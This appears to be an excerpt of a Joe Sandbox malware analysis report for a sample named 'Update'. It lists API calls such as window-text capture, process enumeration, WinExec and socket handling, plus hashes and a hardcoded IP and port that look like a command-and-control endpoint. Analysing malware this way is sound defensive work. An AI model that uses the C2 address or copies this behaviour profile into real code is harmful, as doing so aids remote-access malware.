                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                            • String ID: Console\0
                                                                                            • API String ID: 1348767993-1253790388
                                                                                            • Opcode ID: 69c2c6c30cdfb0c75d68748de46553b4f713487c3565e9805fbcd0b68e5b9f7b
                                                                                            • Instruction ID: 2bddf9a9532ba78909b50ae3b93c1d9ec1e75ad816697ad2354d9a22e63f3f50
                                                                                            • Opcode Fuzzy Hash: 69c2c6c30cdfb0c75d68748de46553b4f713487c3565e9805fbcd0b68e5b9f7b
                                                                                            • Instruction Fuzzy Hash: C1614BB5E00218AFDB04DFA9D880EAEB7B8FF48310F14416AE915EB351D735AD01CBA4
                                                                                            APIs
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            • _memset.LIBCMT ref: 034EBB21
                                                                                            • GetLastInputInfo.USER32(?), ref: 034EBB37
                                                                                            • GetTickCount.KERNEL32 ref: 034EBB3D
                                                                                            • wsprintfW.USER32 ref: 034EBB66
                                                                                            • GetForegroundWindow.USER32 ref: 034EBB6F
                                                                                            • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 034EBB83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                            • String ID: %d min
                                                                                            • API String ID: 3754759880-1947832151
                                                                                            • Opcode ID: 004c412013ac96320427e75b17cad800ff3908e5cf5e53069e18868bf9481478
                                                                                            • Instruction ID: e8a96f6c961fda3995bb39818fe4bb972767318173c1111f161823e533b3ecc5
                                                                                            • Opcode Fuzzy Hash: 004c412013ac96320427e75b17cad800ff3908e5cf5e53069e18868bf9481478
                                                                                            • Instruction Fuzzy Hash: A741D6B5900218AFCB10DFA4DC88E9FBBB8EF44700F08846AF9099F355D6749A04CBE5
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32(DF800B7B,00000000,00000000,75BF73E0,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6938
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6947
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6960
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E696B
                                                                                            • SysStringLen.OLEAUT32(00000000), ref: 034E69BE
                                                                                            • SysStringLen.OLEAUT32(00000000), ref: 034E69CC
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,035010DB,000000FF), ref: 034E6A2E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,035010DB,000000FF), ref: 034E6A34
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                            • String ID:
                                                                                            • API String ID: 429299433-0
                                                                                            • Opcode ID: 94a52722ca757f8c1f5e33053a2707a00ece501472db211ea4ffb657d0ef69e3
                                                                                            • Instruction ID: 00d0eb7a7becaff135c56ce0c43827cd4c50a449108c57134c8b185e11e34162
                                                                                            • Opcode Fuzzy Hash: 94a52722ca757f8c1f5e33053a2707a00ece501472db211ea4ffb657d0ef69e3
                                                                                            • Instruction Fuzzy Hash: 6741E5B2D002189FCB10DFA9CC84AAFF7B8FB54305F15462BD915EB340D73959058BA4
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: 134.122.155.39$18852$IP=$Port
                                                                                            • API String ID: 4218353326-2559903092
                                                                                            • Opcode ID: 7b48083fd1c04e0053dde555519fa3b31338291c027e03596048f3f0dda91d73
                                                                                            • Instruction ID: d1e02b02344e79de90c6a861924c3ffbd04379553e0bf49b888ee47dbbcf62ab
                                                                                            • Opcode Fuzzy Hash: 7b48083fd1c04e0053dde555519fa3b31338291c027e03596048f3f0dda91d73
                                                                                            • Instruction Fuzzy Hash: E41282B2A12B008BD734CF34C8947A6B7F6BF89318F154A2DD49A87B80E775E5488B51
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C3880FE
                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 6C388139
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 6C38816C
                                                                                            • _strlen.LIBCMT ref: 6C38818B
                                                                                            • Process32NextW.KERNEL32(?,?), ref: 6C3882EF
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C3882FD
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 6C388313
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess32$ByteCharCreateFirstMultiNextSnapshotToolhelp32Wide_strlen
                                                                                            • String ID:
                                                                                            • API String ID: 1292832681-0
                                                                                            • Opcode ID: 5362817bc53350211f5ec73c70bae885ad3527cf06b7e021b58002a8a94cb644
                                                                                            • Instruction ID: 93680d72918fbcd7e2c88e5e13ae571c72e8a998450d1fdf17dff902935e6cd5
                                                                                            • Opcode Fuzzy Hash: 5362817bc53350211f5ec73c70bae885ad3527cf06b7e021b58002a8a94cb644
                                                                                            • Instruction Fuzzy Hash: 39513D729063009BE310DF649C80BDFB7D9EF85318F15062AF99997681E771D9088FA3
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E6DD9
                                                                                            • RegOpenKeyExW.KERNEL32(80000001,03505164,00000000,00020019,75BF73E0), ref: 034E6DFC
                                                                                            • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 034E6E4A
                                                                                            • lstrcmpW.KERNEL32(?,03505148), ref: 034E6E60
                                                                                            • lstrcpyW.KERNEL32(034E56EA,?), ref: 034E6E72
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                            • String ID: GROUP
                                                                                            • API String ID: 2102619503-2593425013
                                                                                            • Opcode ID: 5a09c1d382a454d8433a3834c1a743e01dc13cdaaf3f2a914cc16d8d46ab895b
                                                                                            • Instruction ID: acbdf1c5a58432053e26e1a8e41da09fa3fa7522f1f2674b32b4c6cb89b59775
                                                                                            • Opcode Fuzzy Hash: 5a09c1d382a454d8433a3834c1a743e01dc13cdaaf3f2a914cc16d8d46ab895b
                                                                                            • Instruction Fuzzy Hash: 7431C471900318AFDB20DF94DC8DF9EB7B8EB08714F140299E519AA2D0DB79AA84CF54
APIs
• ___set_flsgetvalue.LIBCMT ref: 034EFA4E
• __calloc_crt.LIBCMT ref: 034EFA5A
• __getptd.LIBCMT ref: 034EFA67
• CreateThread.KERNEL32(?,?,034EF9C4,00000000,?,?), ref: 034EFA9E
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 034EFAA8
• _free.LIBCMT ref: 034EFAB1
• __dosmaperr.LIBCMT ref: 034EFABC
  • Part of subcall function 034EF91B: __getptd_noexit.LIBCMT ref: 034EF91B
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
APIs
• ___set_flsgetvalue.LIBCMT ref: 10007240
• __calloc_crt.LIBCMT ref: 1000724C
• __getptd.LIBCMT ref: 10007259
• CreateThread.KERNEL32(?,?,100071B6,00000000,?,?), ref: 10007290
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 1000729A
• _free.LIBCMT ref: 100072A3
• __dosmaperr.LIBCMT ref: 100072AE
  • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
APIs
• ___set_flsgetvalue.LIBCMT ref: 034EF9CA
  • Part of subcall function 034F3CA0: TlsGetValue.KERNEL32(00000000,034F3DF9,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000), ref: 034F3CA9
  • Part of subcall function 034F3CA0: DecodePointer.KERNEL32(?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000,?,034F3F06,0000000D), ref: 034F3CBB
  • Part of subcall function 034F3CA0: TlsSetValue.KERNEL32(00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000,?,034F3F06), ref: 034F3CCA
• ___fls_getvalue@4.LIBCMT ref: 034EF9D5
  • Part of subcall function 034F3C80: TlsGetValue.KERNEL32(?,?,034EF9DA,00000000), ref: 034F3C8E
• ___fls_setvalue@8.LIBCMT ref: 034EF9E8
  • Part of subcall function 034F3CD4: DecodePointer.KERNEL32(?,?,?,034EF9ED,00000000,?,00000000), ref: 034F3CE5
• GetLastError.KERNEL32(00000000,?,00000000), ref: 034EF9F1
• ExitThread.KERNEL32 ref: 034EF9F8
• GetCurrentThreadId.KERNEL32 ref: 034EF9FE
• __freefls@4.LIBCMT ref: 034EFA1E
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 2383549826-0
APIs
• ___set_flsgetvalue.LIBCMT ref: 100071BC
  • Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
  • Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
  • Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E
• ___fls_getvalue@4.LIBCMT ref: 100071C7
  • Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742
• ___fls_setvalue@8.LIBCMT ref: 100071DA
  • Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799
• GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
• ExitThread.KERNEL32 ref: 100071EA
• GetCurrentThreadId.KERNEL32 ref: 100071F0
• __freefls@4.LIBCMT ref: 10007210
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 2383549826-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID:
• String ID: $,$jIk
• API String ID: 0-2946808363
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID:
• String ID: $,$jIk
• API String ID: 0-2946808363
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 100032F1
• Sleep.KERNEL32(00000258), ref: 100032FE
• InterlockedExchange.KERNEL32(?,00000000), ref: 10003306
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 10003312
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000331A
• Sleep.KERNEL32(0000012C), ref: 1000332B
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
• String ID:
• API String ID: 3137405945-0
APIs
• CoInitialize.OLE32(00000000), ref: 034E669B
• CoCreateInstance.OLE32(035046FC,00000000,00000001,0350471C,?,?,?,?,?,?,?,?,?,?,034E588A), ref: 034E66B2
• SysFreeString.OLEAUT32(?), ref: 034E674C
• CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,034E588A), ref: 034E677D
Strings
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CreateFreeInitializeInstanceStringUninitialize
• String ID: FriendlyName
• API String ID: 841178590-3623505368
APIs
• _malloc.LIBCMT ref: 034EF721
  • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
  • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
  • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
• std::exception::exception.LIBCMT ref: 034EF756
• std::exception::exception.LIBCMT ref: 034EF770
• __CxxThrowException@8.LIBCMT ref: 034EF781
Strings
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID: bad allocation
• API String ID: 615853336-2104205924
                                                                                            • Opcode ID: 24ab18e8b19f2ca6bdece779ee823c9b69a2a863230c4ab8f337517af7a8e52c
                                                                                            • Instruction ID: 8b8d18ed102eaa682e31b046c6dc279e15e62ec73dc4c9951b5455d1bc432dc0
                                                                                            • Opcode Fuzzy Hash: 24ab18e8b19f2ca6bdece779ee823c9b69a2a863230c4ab8f337517af7a8e52c
                                                                                            • Instruction Fuzzy Hash: 95F0F9755003096FCB10FB95EC25A5E7BA8AB00245F15405FD410EE1F1DB72CA0D9F9C

APIs
• GetCommandLineW.KERNEL32(00000001), ref: 00021C61
• CommandLineToArgvW.SHELL32(00000000), ref: 00021C68
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00020000), ref: 00021CD3
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00021CF3
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00020000,00000000,00000000,00000000,00022778,00000014), ref: 00021D25
Memory Dump Source
• Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_20000_Update.jbxd
Similarity
• API ID: ByteCharCommandLineMultiWide$ArgvFreeLocal
• String ID:
• API String ID: 4060259846-0
• Opcode ID: a0286ab1ddf62902ccc1785eaf32c0fcf33a46d095cc89beeae2652f73cfa1c5
• Instruction ID: 3d0a577c08509f4658f2b430a077fa571f5c16f0c350a2ccb7658f16d7ca1b2c
• Opcode Fuzzy Hash: a0286ab1ddf62902ccc1785eaf32c0fcf33a46d095cc89beeae2652f73cfa1c5
• Instruction Fuzzy Hash: 0131F370604315ABE720EF68AC85B9B77E8EF94710F20092CF959D72C1D734ED088B62

APIs
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: dllmain_raw$dllmain_crt_dispatch
• String ID:
• API String ID: 3136044242-0
• Opcode ID: ec660802f505d79b66ad04a2c1451b5f64a7fb4d0d61128bc4e0a2458d93d3c4
• Instruction ID: 6083aa081278cbbaa7e44a9ab894ecd28ef80fcf4f88cd70351ba4089d36c147
• Opcode Fuzzy Hash: ec660802f505d79b66ad04a2c1451b5f64a7fb4d0d61128bc4e0a2458d93d3c4
• Instruction Fuzzy Hash: 6B2183B1D07216ABDB219E56DC40EEF3A7ADF81A98F11421AF8545BB10C7328D028FE1

APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10002D3C
• CancelIo.KERNEL32(?), ref: 10002D46
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 10002D4F
• closesocket.WS2_32(?), ref: 10002D59
• SetEvent.KERNEL32(00000001), ref: 10002D63
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
• String ID:
• API String ID: 1486965892-0
• Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
• Instruction ID: c3dd280d0a222891198d8956340d5cd90ea8efbda93af296f9b36197db09124c
• Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
• Instruction Fuzzy Hash: 95F04F75100710EFE320DF94CC89F5677B8FB49B12F148659F6829B690C7B1F9048BA0

APIs
• WinExec.KERNEL32(00000000,00000000), ref: 6C38416E
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: Exec
• String ID: &$'$j)wh
• API String ID: 459137531-3604346523
• Opcode ID: 14a7fed1073a974f124c841827d6b5b31bdd49d660d84e676eaa0cd2b9812ae5
• Instruction ID: 472d665a10981cd5108108ead8f68073784a2d1909221f8597e894e8c7151f7d
• Opcode Fuzzy Hash: 14a7fed1073a974f124c841827d6b5b31bdd49d660d84e676eaa0cd2b9812ae5
• Instruction Fuzzy Hash: 46710471C05258CBDB14DFA4C8583EEBBB2BF41308F15465CD0556BB81DBB956C88FA2

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: _strlen
• String ID: (K[$134.122.155.39$18852
• API String ID: 4218353326-3990176184
• Opcode ID: a61d72dfcd8eb1ca84d7b90833e5b8a8cec6ab8dd13ca4cc2502d6d744eae7bd
• Instruction ID: 7b5c100c51f1c57ea368796cd16c1a80ca80b65ea98ca9c63a82ab7b977c5f4f
• Opcode Fuzzy Hash: a61d72dfcd8eb1ca84d7b90833e5b8a8cec6ab8dd13ca4cc2502d6d744eae7bd
• Instruction Fuzzy Hash: BD412BB15122005FD734EF24E844B9A7BF9FF55308F55062CE049CBB81E739D6488BA2

APIs
• _malloc.LIBCMT ref: 10006F31
  • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
  • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
  • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
• std::exception::exception.LIBCMT ref: 10006F66
• std::exception::exception.LIBCMT ref: 10006F80
• __CxxThrowException@8.LIBCMT ref: 10006F91
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
